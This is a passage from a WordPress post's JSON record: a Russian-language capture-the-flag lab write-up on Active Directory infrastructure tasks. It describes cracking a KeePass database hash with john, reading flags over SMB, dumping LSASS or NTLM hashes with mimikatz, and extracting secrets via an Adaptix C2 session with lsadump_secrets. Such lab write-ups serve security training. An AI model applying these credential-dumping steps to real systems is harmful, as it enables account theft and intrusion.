\u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435. \u0423 \u043d\u0430\u0441 \u0438\u0445 \u043a \u044d\u0442\u043e\u043c\u0443 \u0437\u0430\u0434\u0430\u043d\u0438\u044e \u0443\u0436\u0435 \u0432\u0430\u0433\u043e\u043d \u0438 \u043c\u0430\u043b\u0435\u043d\u044c\u043a\u0430\u044f \u0442\u0435\u043b\u0435\u0433\u0430.\u041d\u043e \u043f\u043e\u043b\u0443\u0447\u0430\u043b \u043e\u0448\u0438\u0431\u043a\u0443 rpc_s_access_denied. \u041f\u0440\u043e\u0431\u043e\u0432\u0430\u043b \u0440\u0430\u0437\u043d\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 cve, \u0438 \u0434\u0430\u0436\u0435 \u0447\u0435\u0440\u0435\u0437 \u043c\u0435\u0442\u0430\u0441\u043f\u043b\u043e\u0439\u0442, \u0435\u0441\u0442\u044c \u0433\u043e\u0442\u043e\u0432\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442, \u043d\u043e \u0431\u043e\u0440\u043e\u0434\u0430.\u0412 \u0438\u0442\u043e\u0433\u0435 \u044f \u0437\u0430\u0431\u0438\u043b \u043d\u0430 \u044d\u0442\u043e \u0434\u0435\u043b\u043e \u0438 \u043f\u0435\u0440\u0435\u0448\u0435\u043b \u043a \u0434\u0440\u0443\u0433\u043e\u043c\u0443 \u0437\u0430\u0434\u0430\u043d\u0438\u044e. \u042f \u043f\u043e\u0448\u0435\u043b \u0434\u0430\u043b\u0435\u0435 \u043f\u044b\u043b\u0435\u0441\u043e\u0441\u0438\u0442\u044c \u0441\u043e\u0441\u0435\u0434\u043d\u0438\u0435 \u043f\u043a \u043d\u0430 \u043f\u0440\u0435\u0434\u043c\u0435\u0442 \u0434\u0440\u0443\u0433\u0438\u0445 \u043a\u0440\u0435\u0434\u043e\u0432 \u0438\u043b\u0438 \u0434\u0440\u0443\u0433\u043e\u0439 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u0438\u043d\u0444\u044b.\u041f\u043e\u043a\u0430 \u044f \u0448\u0430\u0440\u0438\u043b\u0441\u044f \u043f\u043e \u043a\u043e\u043c\u043f\u0430\u043c \u044f \u0443\u0432\u0438\u0434\u0435\u043b \u0435\u0449\u0435 \u043e\u0434\u0438\u043d \u0444\u043b\u0430\u0433 \u043e\u043d \u043e\u043a\u0430\u0437\u0430\u043b\u0441\u044f \u0438\u0437 10 \u0437\u0430\u0434\u0430\u043d\u0438\u044f.[infra-10] \u041f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0440\u0430\u0431\u043e\u0447\u0438\u0445 \u0441\u0442\u0430\u043d\u0446\u0438\u0439\u041d\u0443\u0436\u043d\u043e \u043f\u0440\u043e\u0447\u0438\u0442\u0430\u0442\u044c \u0444\u043b\u0430\u0433 \u043d\u0430 \u043a\u043e\u043c\u043f\u0435 ws \u0430\u0434\u043c\u0438\u043d\u0430, \u043e\u0442 \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u0443\u0436\u0435 \u0435\u0441\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f. \u0415\u0441\u0442\u044c smb \u043f\u0440\u0438\u0447\u0435\u043c \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 read,write \u043d\u0430 2 \u043f\u0430\u043f\u043a\u0438.\u0428\u0430\u0440\u044b_smb\u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0435\u043c\u0441\u044f \u0447\u0435\u0440\u0435\u0437 smbclient \u0447\u0438\u0442\u0430\u0435\u043c \u0444\u043b\u0430\u0433, \u0433\u0440\u0443\u0437\u0438\u043c \u0430\u0433\u0435\u043d\u0442\u0430 \u0434\u043b\u044f \u0443\u0434\u043e\u0431\u0441\u0442\u0432\u0430.\u041d\u043e \u0432\u0435\u0440\u043d\u0435\u043c\u0441\u044f \u043a \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u043c\u0443 \u0437\u0430\u0434\u0430\u043d\u0438\u044e.\u0412 \u0434\u043e\u043a\u0443\u043c\u0435\u0442\u0430\u0445 \u043d\u0430 \u044d\u0442\u043e\u043c \u0436\u0435 \u043a\u043e\u043c\u043f\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f L_Shepherd_admin \u043d\u0430\u0445\u043e\u0434\u0438\u043c \u0444\u0430\u0439\u043b Database.kdbx.\u0411\u0430\u0437\u0430_\u0433\u0434\u0435_\u0434\u0435\u043d\u044c\u0433\u0438_\u043b\u0435\u0436\u0430\u0442\u0411\u0430\u0437\u0430 \u0434\u0430\u043d\u043d\u044b\u0445 \u0435\u0441\u0442\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u043f\u043e\u0434 \u043f\u0430\u0440\u043e\u043b\u0435\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u0435\u043d. \u0421\u043d\u0438\u043c\u0430\u0435\u043c \u0445\u044d\u0448 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0434\u0436\u043e\u043d\u0430 \u0438 \u0431\u0440\u0443\u0442\u0438\u043c.\u041b\u043e\u043c\u0430\u0435\u043c_\u0431\u0430\u0437\u0443\u041e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u043c_\u0431\u0430\u0437\u0443\u0417\u0434\u0435\u0441\u044c \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043a\u0440\u0435\u0434\u044b \u0435\u0449\u0435 \u043e\u0442 \u0434\u0432\u0443\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439.\u0423\u0436\u0435 \u0441 \u044d\u0442\u0438\u043c\u0438 \u043a\u0440\u0435\u0434\u0430\u043c\u0438 \u0437\u0430\u0445\u043e\u0434\u0438\u043c \u043d\u0430 \u043a\u043e\u043c\u043f BACKUP \u0438 \u0447\u0438\u0442\u0430\u0435\u043c \u0444\u043b\u0430\u0433.[infra-11] \u0412\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u0430\u0440\u043e\u043b\u044f \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438\u0422\u043e\u0436\u0435 \u043d\u0435\u043f\u043b\u043e\u0445\u043e\u0435 \u0437\u0430\u0434\u0430\u043d\u0438\u0435. \u041f\u043e \u0437\u0430\u0434\u0443\u043c\u043a\u0435 \u0430\u0432\u0442\u043e\u0440\u0430 \u0438\u0437 \u043f\u043e\u0434\u0441\u043a\u0430\u0437\u043a\u0438.\u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u0438\u0437 \u0433\u0440\u0443\u043f\u043f\u044b ws_admins \u0437\u0430\u0439\u0434\u0438\u0442\u0435 \u0432 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440 (cfrazier.edu.stf), \u0441\u043e\u0437\u0434\u0430\u0439\u0442\u0435 \u0434\u0430\u043c\u043f LSASS \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u0435 \u0445\u0435\u0448-\u0441\u0443\u043c\u043c\u0443 \u043f\u0430\u0440\u043e\u043b\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f.\u0414\u0430\u043b\u0435\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0439\u0442\u0435 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b (john, Hashcat) \u0434\u043b\u044f \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0430\u0440\u043e\u043b\u044f.\u041a\u043e\u043d\u0435\u0447\u043d\u043e \u043c\u043e\u0436\u043d\u043e \u0441 \u0441\u043e\u0431\u043e\u0439 \u0442\u0430\u0441\u043a\u0430\u0442\u044c mimikatz \u0438 \u0434\u0430\u043c\u043f\u0438\u0442\u044c NTLM \u0445\u044d\u0448\u0438 \u043f\u0430\u0440\u043e\u043b\u0435\u0439.\u041e\u0434\u043d\u0430\u043a\u043e \u043a\u043e\u0433\u0434\u0430 \u0443 \u0432\u0430\u0441 \u0435\u0441\u0442\u044c \u0441\u0441\u0435\u0441\u0441\u0438\u044f \u0432 Adaptix C2, \u043f\u0440\u0438\u0447\u0435\u043c \u0443\u0436\u0435 High Level, \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c\u0441\u044f \u0434\u043e SYSTEM.\u0414\u0430\u043b\u0435\u0435 \u0432\u0432\u043e\u0434\u0438\u043c \u043a\u043e\u043c\u0430\u043d\u0434\u0443lsadump_secrets\u0414\u0430\u043c\u043f\u0438\u043c_\u0441\u0435\u043a\u0440\u0435\u0442\u044b\u041f\u0430\u0440\u043e\u043b\u044c \u0443\u0436\u0435 \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0432\u0438\u0434\u0435. \u041e\u0434\u043d\u0430\u043a\u043e \u043d\u0435 \u0432\u0441\u0435\u0433\u0434\u0430 \u044d\u0442\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442, \u043d\u043e \u0432 \u0434\u0430\u043d\u043d\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-482295","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/482295","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=482295"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/482295\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=482295"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=482295"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=482295"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}